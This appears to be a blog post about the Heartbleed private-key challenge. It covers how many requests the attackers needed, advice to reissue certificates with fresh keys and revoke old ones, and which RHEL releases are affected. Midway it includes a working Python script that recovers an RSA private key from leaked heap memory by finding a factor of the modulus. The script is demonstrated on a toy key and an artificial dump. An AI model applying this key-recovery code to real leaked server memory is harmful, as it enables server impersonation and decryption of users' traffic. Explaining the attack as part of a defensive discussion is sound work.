Damn, that didn’t take long. A server reboot might have contributed, but it looks like the private key got ganked pretty fast. What would be really nice (as I’ve suggested on the CloudFlare blog) would be if someone (them) could author some software to monitor the memory space during such a trial. If we could see where the valuable data was located in memory and produce a heat map representing attacked memory spaces, that would be pretty sweet and we’d have some more solid data to contribute to this investigation.
One other point to note is that, regardless of the server reboot, the aggressors did make hundreds of thousands (one made millions) of requests and scoured the retrieved data for the key material. Each leaked response is at most 64 KB of whatever happened to sit in the process heap, so this is a volume game: you need the bandwidth, the time, a target that stays up long enough, and a way to recognise key material in the noise. That capability is, needless to say, not present everywhere.
Nonetheless, it doesn’t bode well for security. It is now demonstrably possible to obtain a private key from a server running the vulnerable OpenSSL, with no other foothold on the box and nothing in the server’s logs to show for it. Bummer. If you run a secure operation, you should probably fork over the cash for reissued certificates after you patch your systems, and the reissue must be against a freshly generated key: a new certificate wrapping the same key buys nothing if that key has already leaked, and the old certificate should be revoked as well.
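What the "scouring" step actually looks like is worth seeing, because it is the part that turns a pile of leaked bytes into a usable key. The following is an added example, not code from the original post nor from any of the challenge entrants: it assumes the standard approach of scanning the dump for a run of bytes that, read as a little-endian integer (the in-memory layout of an OpenSSL BIGNUM on x86), divides the server's public modulus N. The dump here is constructed (seeded pseudo-random junk with a prime planted in it) and the key is a toy one built from two small Mersenne primes so the script runs instantly; the names `build_leak`, `find_factor` and `recover_private_key` are mine.

```python
"""Recover an RSA private key from leaked process memory (added example).

Given the server's public modulus N, slide a window over the leaked bytes and
test each window, read as a little-endian integer, for divisibility by N.
Any non-trivial divisor is one of the two primes; the other and the private
exponent follow from it.  Nothing about the leak's *layout* needs to be
known, which is why this works on 64 KB chunks of arbitrary heap.
"""
import random
from typing import Optional, Tuple

# Toy key: two Mersenne primes.  Real keys use 1024-bit primes (128-byte
# limb runs for RSA-2048); only LIMB_BYTES changes, the search is identical.
P = (1 << 61) - 1          # fits in 8 bytes
Q = (1 << 89) - 1
N = P * Q
E = 65537
LIMB_BYTES = 8             # width of the prime we expect to find in memory


def find_factor(dump: bytes, modulus: int, limb_bytes: int) -> Optional[int]:
    """Return the first window value v with 1 < v < modulus and v | modulus,
    or None if the dump contains no factor at this width."""
    for off in range(len(dump) - limb_bytes + 1):
        v = int.from_bytes(dump[off:off + limb_bytes], "little")
        if 1 < v < modulus and modulus % v == 0:
            return v
    return None


def recover_private_key(dump: bytes, modulus: int, e: int = E,
                        limb_bytes: int = LIMB_BYTES
                        ) -> Optional[Tuple[int, int, int]]:
    """Return (p, q, d) if a prime factor of modulus is present in dump."""
    p = find_factor(dump, modulus, limb_bytes)
    if p is None:
        return None
    q = modulus // p
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)     # private exponent; needs Python 3.8+
    return p, q, d


def build_leak(seed: int = 1, planted: Optional[int] = P,
               size: int = 64 * 1024) -> bytes:
    """Constructed stand-in for one heartbeat response: seeded junk bytes
    with the little-endian limbs of `planted` dropped in at a random offset
    (planted=None gives a dump with nothing useful in it)."""
    rng = random.Random(seed)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    if planted is not None:
        limbs = planted.to_bytes(LIMB_BYTES, "little")
        pos = rng.randrange(0, size - len(limbs))
        buf[pos:pos + len(limbs)] = limbs
    return bytes(buf)


if __name__ == "__main__":
    key = recover_private_key(build_leak(), N)
    print("nothing found" if key is None else "recovered p=%d q=%d" % key[:2])
    print("empty dump ->", recover_private_key(build_leak(planted=None), N))
```

The divisibility test is cheap (one big-integer modulo per window), so scanning a 64 KB response at 128-byte width costs nothing, and an attacker can simply run it over every response as it arrives until it hits; that is why the number of requests, not any cleverness, was the limiting factor in the challenge.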
One thing which struck me at work, however, is that many mainstream open source software packages are not vulnerable to this exploit. People are tossing about a 40% figure when discussing the number of servers on the Internet which are vulnerable, but I’m wondering where that figure comes from. It resembles figures I’ve seen for the share of non-Windows systems on the Internet, so if we’re just assuming that all non-Windows systems are vulnerable, that may well be a very poor assumption.
In the Red Hat Enterprise Linux environment, for example, only RHEL 6.5 systems (or RHEL 6 systems upgraded to the affected OpenSSL package, which first shipped with RHEL 6.5) and the RHEL 7.0 Beta systems are affected. RHEL 5 is still supported and is simply unaffected: it ships the older 0.9.8 branch, and the TLS heartbeat extension that carries the bug only arrived in OpenSSL 1.0.1. One caveat when checking a RHEL 6.5 box: Red Hat backports fixes, so the patched package still reports version 1.0.1e. Judge by the package release and errata, not by the version string that `openssl version` prints. That’s probably a pretty big market share, and I’m sure that someone more inclined to do the research could determine some important facts about the major Linux distributions out there to cut down on the percentage of systems likely to have been affected by this vulnerability.
I don’t mean to continually attempt to minimize the impact of this exploit; it is a terrible vulnerability that has significantly harmed public security, but I am not convinced that it is as cataclysmic as so many reports make it out to be.